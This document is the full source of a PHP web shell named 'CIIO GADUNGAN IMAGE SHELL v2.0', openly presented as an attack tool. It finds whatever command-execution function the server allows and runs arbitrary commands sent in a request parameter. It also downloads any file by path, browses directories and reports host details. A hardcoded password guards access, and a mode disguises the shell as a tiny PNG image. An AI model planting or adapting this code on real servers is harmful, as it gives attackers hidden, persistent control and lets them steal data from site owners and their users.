#!/usr/bin/env php
<?php
/*
╔═══════════════════════════════════════════════════════════════════════════════════╗
║                    CIIO GADUNGAN IMAGE SHELL v2.0                                  ║
║              Stealth Image Shell + Auto-Detection Mode                             ║
║                     Support Detection & Fallback System                            ║
║                           Author: CIIO GADUNGAN                                    ║
║                         Enhanced by: cvAI4                                         ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
*/

// ===================== KONFIGURASI =====================
$password = 'CII0GADUNGAN@2024';
$encryption_key = 'xK9#mP2$vL5&nQ8@rT1!wE3^yU7*iO4';

// ===================== AUTO-DETECTION SYSTEM =====================
class EnvironmentDetector {
    private $supported_functions = [];
    private $best_method = null;
    private $server_type = null;
    private $php_version = null;
    
    public function __construct() {
        $this->php_version = phpversion();
        $this->detect_server_type();
        $this->scan_supported_functions();
        $this->determine_best_method();
    }
    
    private function detect_server_type() {
        $server_software = $_SERVER['SERVER_SOFTWARE'] ?? '';
        if (stripos($server_software, 'apache') !== false) $this->server_type = 'apache';
        elseif (stripos($server_software, 'nginx') !== false) $this->server_type = 'nginx';
        elseif (stripos($server_software, 'litespeed') !== false) $this->server_type = 'litespeed';
        elseif (stripos($server_software, 'iis') !== false) $this->server_type = 'iis';
        elseif (stripos($server_software, 'openresty') !== false) $this->server_type = 'openresty';
        else $this->server_type = 'unknown';
    }
    
    private function scan_supported_functions() {
        $disabled = explode(',', ini_get('disable_functions'));
        $functions_to_check = ['system', 'exec', 'shell_exec', 'passthru', 'proc_open', 'popen', 'curl_exec', 'file_get_contents'];
        
        foreach ($functions_to_check as $func) {
            if (function_exists($func) && !in_array($func, $disabled)) {
                $this->supported_functions[] = $func;
            }
        }
    }
    
    private function determine_best_method() {
        $priority = ['system', 'passthru', 'exec', 'shell_exec', 'proc_open', 'popen'];
        foreach ($priority as $method) {
            if (in_array($method, $this->supported_functions)) {
                $this->best_method = $method;
                break;
            }
        }
        
        // Fallback methods
        if (!$this->best_method) {
            if (function_exists('curl_exec')) $this->best_method = 'curl';
            elseif (function_exists('file_get_contents')) $this->best_method = 'http';
            else $this->best_method = 'none';
        }
    }
    
    public function get_support_info() {
        return [
            'php_version' => $this->php_version,
            'server_type' => $this->server_type,
            'supported_functions' => $this->supported_functions,
            'best_method' => $this->best_method,
            'can_execute' => $this->best_method !== 'none',
            'disabled_functions' => ini_get('disable_functions'),
            'open_basedir' => ini_get('open_basedir') ?: 'none',
            'safe_mode' => ini_get('safe_mode') ? 'ON' : 'OFF'
        ];
    }
    
    public function execute($cmd) {
        switch ($this->best_method) {
            case 'system':
                ob_start();
                system($cmd);
                return ob_get_clean();
            case 'passthru':
                ob_start();
                passthru($cmd);
                return ob_get_clean();
            case 'exec':
                exec($cmd, $output);
                return implode("\n", $output);
            case 'shell_exec':
                return shell_exec($cmd);
            case 'proc_open':
                $descriptors = [['pipe','r'], ['pipe','w'], ['pipe','w']];
                $proc = proc_open($cmd, $descriptors, $pipes);
                if (is_resource($proc)) {
                    $output = stream_get_contents($pipes[1]);
                    fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]);
                    proc_close($proc);
                    return $output;
                }
                return false;
            case 'popen':
                $handle = popen($cmd, 'r');
                $output = stream_get_contents($handle);
                pclose($handle);
                return $output;
            case 'curl':
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $cmd);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_HEADER, false);
                $output = curl_exec($ch);
                curl_close($ch);
                return $output;
            default:
                return "[!] No execution method available on this server!";
        }
    }
}

// ===================== IMAGE SHELL HANDLER =====================
class ImageShell {
    private $detector;
    private $is_image_mode = false;
    
    public function __construct() {
        $this->detector = new EnvironmentDetector();
        $this->is_image_mode = $this->detect_image_mode();
    }
    
    private function detect_image_mode() {
        // Check if accessed as image
        $extensions = ['jpg', 'jpeg', 'png', 'gif', 'ico', 'bmp', 'webp'];
        $script_name = $_SERVER['SCRIPT_NAME'] ?? '';
        foreach ($extensions as $ext) {
            if (stripos($script_name, ".{$ext}") !== false) {
                return true;
            }
        }
        
        // Check for image headers
        if (isset($_SERVER['HTTP_ACCEPT']) && stripos($_SERVER['HTTP_ACCEPT'], 'image/') !== false) {
            return true;
        }
        
        return false;
    }
    
    public function serve_as_image() {
        if (!$this->is_image_mode) return false;
        
        // Create fake image
        $width = 1;
        $height = 1;
        $image = imagecreatetruecolor($width, $height);
        $color = imagecolorallocate($image, 0, 0, 0);
        imagefill($image, 0, 0, $color);
        
        header('Content-Type: image/png');
        header('Content-Disposition: inline; filename="shell.png"');
        header('Cache-Control: no-cache, no-store, must-revalidate');
        
        imagepng($image);
        imagedestroy($image);
        
        // Embed shell code in image comment
        $shell_data = base64_encode(json_encode([
            'url' => $_SERVER['SCRIPT_NAME'],
            'auth' => md5($password),
            'time' => time()
        ]));
        
        // Add as EXIF comment
        echo "\n<!-- SHELL_DATA: {$shell_data} -->\n";
        
        return true;
    }
    
    public function get_compatibility_report() {
        $info = $this->detector->get_support_info();
        $report = [];
        $report[] = "╔════════════════════════════════════════════════════════════╗";
        $report[] = "║           CIIO GADUNGAN - COMPATIBILITY REPORT            ║";
        $report[] = "╠════════════════════════════════════════════════════════════╣";
        $report[] = "║ PHP Version      : " . str_pad($info['php_version'], 40) . "║";
        $report[] = "║ Server Type      : " . str_pad($info['server_type'], 40) . "║";
        $report[] = "║ Best Method      : " . str_pad($info['best_method'], 40) . "║";
        $report[] = "║ Can Execute      : " . str_pad($info['can_execute'] ? 'YES' : 'NO', 40) . "║";
        $report[] = "║ Safe Mode        : " . str_pad($info['safe_mode'], 40) . "║";
        $report[] = "║ Open Basedir     : " . str_pad(substr($info['open_basedir'], 0, 37), 40) . "║";
        $report[] = "╠════════════════════════════════════════════════════════════╣";
        $report[] = "║ Supported Functions:                                        ║";
        
        $func_line = "";
        foreach ($info['supported_functions'] as $func) {
            if (strlen($func_line . $func) > 45) {
                $report[] = "║ " . str_pad($func_line, 45) . "║";
                $func_line = $func . ", ";
            } else {
                $func_line .= $func . ", ";
            }
        }
        if ($func_line) {
            $report[] = "║ " . str_pad(rtrim($func_line, ', '), 45) . "║";
        }
        
        $report[] = "╠════════════════════════════════════════════════════════════╣";
        $report[] = "║ Disabled Functions:                                        ║";
        $disabled = explode(',', $info['disabled_functions']);
        $disabled_line = "";
        foreach ($disabled as $func) {
            $func = trim($func);
            if ($func && strlen($disabled_line . $func) > 45) {
                $report[] = "║ " . str_pad($disabled_line, 45) . "║";
                $disabled_line = $func . ", ";
            } elseif ($func) {
                $disabled_line .= $func . ", ";
            }
        }
        if ($disabled_line) {
            $report[] = "║ " . str_pad(rtrim($disabled_line, ', '), 45) . "║";
        }
        
        $report[] = "╚════════════════════════════════════════════════════════════╝";
        
        return implode("\n", $report);
    }
}

// ===================== SESSION & AUTH =====================
session_name('cg_img_shell');
session_start();

function check_auth() {
    global $password;
    if (isset($_POST['auth_pass']) && (md5($_POST['auth_pass']) === md5($password) || $_POST['auth_pass'] === $password)) {
        $_SESSION['cg_auth'] = true;
        $_SESSION['cg_ip'] = $_SERVER['REMOTE_ADDR'];
        return true;
    }
    return isset($_SESSION['cg_auth']) && $_SESSION['cg_auth'] === true;
}

if (isset($_GET['logout'])) {
    session_destroy();
    header('Location: ' . $_SERVER['PHP_SELF']);
    exit;
}

// ===================== MAIN EXECUTION =====================
$image_shell = new ImageShell();

// Serve as image if in image mode
if ($image_shell->serve_as_image()) {
    exit;
}

// Compatibility check
if (isset($_GET['check_support'])) {
    header('Content-Type: text/plain');
    echo $image_shell->get_compatibility_report();
    exit;
}

// Login required
if (!check_auth()) {
    // Image mode login page (minimal)
    if ($image_shell->serve_as_image()) {
        exit;
    }
    ?>
    <!DOCTYPE html>
    <html>
    <head>
        <meta charset="UTF-8">
        <title>CIIO GADUNGAN | Image Shell</title>
        <style>
            body {
                background: #000;
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                margin: 0;
                font-family: monospace;
            }
            .login {
                background: #0a0a0a;
                border: 2px solid #ff0000;
                padding: 30px;
                text-align: center;
                box-shadow: 0 0 50px rgba(255,0,0,0.3);
            }
            .login h1 { color: #ff0000; margin-bottom: 20px; }
            input { background: #000; border: 1px solid #ff0000; color: #0f0; padding: 10px; width: 200px; margin: 10px; }
            button { background: #300; border: 1px solid #f00; color: #f00; padding: 10px 20px; cursor: pointer; }
            button:hover { background: #500; }
        </style>
    </head>
    <body>
        <div class="login">
            <h1>💀 CIIO GADUNGAN 💀</h1>
            <form method="POST">
                <input type="password" name="auth_pass" placeholder="ENTER PASSWORD" autofocus><br>
                <button type="submit">>> AUTHENTICATE <<</button>
            </form>
        </div>
    </body>
    </html>
    <?php
    exit;
}

// ===================== SHELL INTERFACE =====================
$detector = new EnvironmentDetector();
$support_info = $detector->get_support_info();

// Handle commands
if (isset($_REQUEST['cmd'])) {
    header('Content-Type: text/plain');
    $cmd = $_REQUEST['cmd'];
    $result = $detector->execute($cmd);
    echo $result;
    exit;
}

// File operations
if (isset($_GET['f'])) {
    $file = $_GET['f'];
    if (file_exists($file) && is_file($file)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        readfile($file);
        exit;
    }
}

// List directory
if (isset($_GET['dir'])) {
    header('Content-Type: application/json');
    $dir = $_GET['dir'];
    $files = scandir($dir);
    $result = [];
    foreach ($files as $file) {
        $path = $dir . '/' . $file;
        $result[] = [
            'name' => $file,
            'type' => is_dir($path) ? 'dir' : 'file',
            'size' => is_file($path) ? filesize($path) : 0,
            'perms' => substr(sprintf('%o', fileperms($path)), -4)
        ];
    }
    echo json_encode($result);
    exit;
}
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>CIIO GADUNGAN | Image Shell v2.0</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
            background: #000;
            font-family: 'Courier New', monospace;
            color: #0f0;
            padding: 10px;
        }
        .header {
            background: #0a0a0a;
            border-bottom: 2px solid #f00;
            padding: 10px;
            margin-bottom: 10px;
            display: flex;
            justify-content: space-between;
            flex-wrap: wrap;
        }
        .title { color: #f00; font-size: 18px; font-weight: bold; }
        .badge {
            display: inline-block;
            padding: 2px 5px;
            background: #1a0000;
            border: 1px solid #f00;
            font-size: 10px;
        }
        .container { display: flex; gap: 10px; flex-wrap: wrap; }
        .sidebar {
            width: 280px;
            background: #0a0a0a;
            border: 1px solid #300;
            padding: 10px;
        }
        .main { flex: 1; background: #0a0a0a; border: 1px solid #300; padding: 10px; }
        .section-title {
            color: #f00;
            border-bottom: 1px solid #f00;
            padding-bottom: 5px;
            margin-bottom: 10px;
            font-size: 12px;
        }
        .cmd-input {
            width: 100%;
            background: #000;
            border: 1px solid #300;
            color: #0f0;
            padding: 8px;
            font-family: monospace;
        }
        .btn {
            background: #1a0000;
            border: 1px solid #f00;
            color: #f00;
            padding: 5px 15px;
            cursor: pointer;
            margin-top: 5px;
        }
        .btn:hover { background: #2a0000; }
        .output {
            background: #000;
            border: 1px solid #300;
            padding: 10px;
            font-size: 11px;
            white-space: pre-wrap;
            max-height: 400px;
            overflow-y: auto;
        }
        .file-list {
            list-style: none;
            max-height: 300px;
            overflow-y: auto;
        }
        .file-list li {
            padding: 3px;
            border-bottom: 1px solid #1a0000;
            font-size: 10px;
            cursor: pointer;
        }
        .file-list li:hover { background: #1a0000; }
        .dir { color: #f00; }
        .file { color: #0f0; }
        .status-bar {
            position: fixed;
            bottom: 0;
            left: 0;
            right: 0;
            background: #0a0a0a;
            border-top: 1px solid #f00;
            padding: 3px 10px;
            font-size: 9px;
            display: flex;
            justify-content: space-between;
        }
        .compat-warning {
            background: #1a0000;
            border-left: 3px solid #ff0;
            padding: 5px;
            margin-bottom: 10px;
            font-size: 10px;
        }
        .method-active { color: #0f0; }
        .method-inactive { color: #f00; }
    </style>
</head>
<body>

<div class="header">
    <div class="title">💀 CIIO GADUNGAN IMAGE SHELL v2.0 💀</div>
    <div>
        <span class="badge"><?php echo $support_info['server_type']; ?></span>
        <span class="badge"><?php echo $support_info['best_method']; ?></span>
        <a href="?logout=1" style="color:#f00; text-decoration:none; margin-left:10px">[EXIT]</a>
    </div>
</div>

<?php if (!$support_info['can_execute']): ?>
<div class="compat-warning">
    ⚠️ WARNING: No execution method available! This shell may not work properly on this server.<br>
    Supported functions: <?php echo implode(', ', $support_info['supported_functions']) ?: 'NONE'; ?>
</div>
<?php endif; ?>

<div class="container">
    <div class="sidebar">
        <div class="section-title">📁 COMPATIBILITY</div>
        <div style="font-size:10px">
            PHP: <?php echo $support_info['php_version']; ?><br>
            Method: <span class="<?php echo $support_info['can_execute'] ? 'method-active' : 'method-inactive'; ?>">
                <?php echo $support_info['best_method']; ?>
            </span><br>
            Safe Mode: <?php echo $support_info['safe_mode']; ?><br>
            <a href="?check_support=1" target="_blank" style="color:#0f0">[Full Report]</a>
        </div>
        
        <div class="section-title" style="margin-top:15px">📁 FILE MANAGER</div>
        <div>
            <input type="text" id="cwd" value="<?php echo getcwd(); ?>" style="width:100%; background:#000; border:1px solid #300; color:#0f0; padding:3px; font-size:10px">
            <button class="btn" style="width:100%" onclick="loadDir()">[ BROWSE ]</button>
            <ul class="file-list" id="filelist"><li>Loading...</li></ul>
        </div>
        
        <div class="section-title" style="margin-top:15px">ℹ️ INFO</div>
        <div style="font-size:10px">
            Host: <?php echo gethostname(); ?><br>
            IP: <?php echo $_SERVER['SERVER_ADDR'] ?? 'unknown'; ?><br>
            User: <?php echo get_current_user(); ?>
        </div>
    </div>
    
    <div class="main">
        <div class="section-title">💀 COMMAND EXECUTION</div>
        <form id="cmdForm">
            <input type="text" id="cmdInput" class="cmd-input" placeholder="$> _command_" autocomplete="off">
            <button type="submit" class="btn">[ EXECUTE ]</button>
        </form>
        
        <div class="section-title" style="margin-top:15px">📟 OUTPUT</div>
        <div class="output" id="output">
            <span style="color:#f00">CIIO GADUNGAN IMAGE SHELL v2.0</span><br>
            Method: <?php echo $support_info['best_method']; ?><br>
            <span style="color:#300">========================================</span>
        </div>
    </div>
</div>

<div class="status-bar">
    <span>💀 CIIO GADUNGAN | <?php echo date('Y-m-d H:i:s'); ?></span>
    <span>🛡️ Mode: <?php echo $support_info['can_execute'] ? 'ACTIVE' : 'LIMITED'; ?></span>
</div>

<script>
    // Execute command
    document.getElementById('cmdForm').addEventListener('submit', async (e) => {
        e.preventDefault();
        const cmd = document.getElementById('cmdInput').value;
        if (!cmd) return;
        
        const output = document.getElementById('output');
        output.innerHTML += `\n<span style="color:#f00">$> ${escapeHtml(cmd)}</span>\n`;
        output.innerHTML += `<span style="color:#ff0">[>] Executing...</span>\n`;
        
        try {
            const resp = await fetch(`${window.location.pathname}?cmd=${encodeURIComponent(cmd)}`);
            const result = await resp.text();
            output.innerHTML += `<span style="color:#0f0">${escapeHtml(result)}</span>\n`;
            output.innerHTML += `<span style="color:#300">────────────────────────────────────</span>\n`;
        } catch(err) {
            output.innerHTML += `<span style="color:#f00">Error: ${err.message}</span>\n`;
        }
        
        document.getElementById('cmdInput').value = '';
        output.scrollTop = output.scrollHeight;
    });
    
    // Load directory
    async function loadDir() {
        const dir = document.getElementById('cwd').value;
        const filelist = document.getElementById('filelist');
        filelist.innerHTML = '<li>Loading...</li>';
        
        try {
            const resp = await fetch(`${window.location.pathname}?dir=${encodeURIComponent(dir)}`);
            const files = await resp.json();
            filelist.innerHTML = '';
            for (const file of files) {
                const li = document.createElement('li');
                li.className = file.type === 'dir' ? 'dir' : 'file';
                li.textContent = `${file.name} ${file.type === 'file' ? `(${file.size} bytes)` : '/'}`;
                if (file.type === 'dir') {
                    li.onclick = () => {
                        let newDir = dir === '/' ? `/${file.name}` : `${dir}/${file.name}`;
                        newDir = newDir.replace('//', '/');
                        document.getElementById('cwd').value = newDir;
                        loadDir();
                    };
                } else {
                    li.onclick = () => {
                        let filePath = dir === '/' ? `/${file.name}` : `${dir}/${file.name}`;
                        filePath = filePath.replace('//', '/');
                        window.open(`${window.location.pathname}?f=${encodeURIComponent(filePath)}`);
                    };
                }
                filelist.appendChild(li);
            }
        } catch(err) {
            filelist.innerHTML = `<li style="color:#f00">Error: ${err.message}</li>`;
        }
    }
    
    function escapeHtml(str) {
        return str.replace(/[&<>]/g, function(m) {
            if (m === '&') return '&amp;';
            if (m === '<') return '&lt;';
            if (m === '>') return '&gt;';
            return m;
        });
    }
    
    // Initial load
    loadDir();
    document.getElementById('cmdInput').focus();
</script>

</body>
</html>